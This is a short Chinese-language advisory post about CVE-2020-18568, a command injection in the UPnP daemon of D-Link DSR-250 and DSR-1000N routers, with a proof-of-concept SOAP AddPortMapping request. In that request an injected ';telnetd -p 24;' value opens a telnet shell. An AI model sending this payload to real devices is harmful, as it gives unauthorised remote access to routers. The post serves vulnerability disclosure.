D-Link DSR-250 DSR-1000N 命令注入(CVE-2020-18568)

# D-Link DSR-250 DSR-1000N 命令注入(CVE-2020-18568)

影响版本:DSR-250(3.14)DSR-1000N(2.11B201)

固件包中有一个upnpd程序,该程序在0.0.0.0上侦听端口1900(udp)和49152(tcp)。通过逆向分析,当程序设置iptable时,未检查参数,这可能导致命令注入。

**PoC:**

“`xml
POST /upnp/control/WANIPConn1 HTTP/1.1
HOST: $control_host:$control_port
Content-Length: $content_length
Content-Type: text/xml; charset=”utf-8″
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping




7331
tcp
1337

1
hackedByC0ss4ck
0.0.0.0
;telnetd -p 24;



“`

ref:

* https://nvd.nist.gov/vuln/detail/CVE-2020-18568
* https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容